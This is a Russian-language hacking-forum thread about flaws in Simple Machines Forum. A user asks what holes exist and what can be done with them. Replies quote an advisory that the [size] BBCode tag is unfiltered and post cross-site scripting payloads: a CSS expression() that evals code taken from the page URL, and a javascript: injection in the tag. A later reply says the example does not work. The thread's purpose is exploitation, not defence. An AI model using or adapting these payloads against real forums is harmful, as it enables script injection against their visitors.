Вопрос про уязвимости в Simple machines forum
 

Кто знает дырки в нем есть

И что мона с этим сотварить?</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">SMF не фильтрует данные, представленные пользователем в тэге '[size]'. Пример:

[size=expression(eval(unescape(document.URL.substr ing(document.URL.
length-41,document.URL.length))))]Big Exploit[/size]

[/QUOTE]<span id='postcolor'>

Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Че Гевара @ августа 26 2004,22:40)</td></tr><tr><td id="QUOTE">Вставить скрипт...
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
[size=javascript:alert('LOL');]LOL[/size]
[/QUOTE]<span id='postcolor'>
Это чисто пример ...[/QUOTE]<span id='postcolor'>
Спасибо тебе конечно за пример но он не прокатывает http://forum.antichat.ru/iB_html/non...s/confused.gif

Ты же написал, что не фильтруются данные ...
Смотри по форуму конкретному ...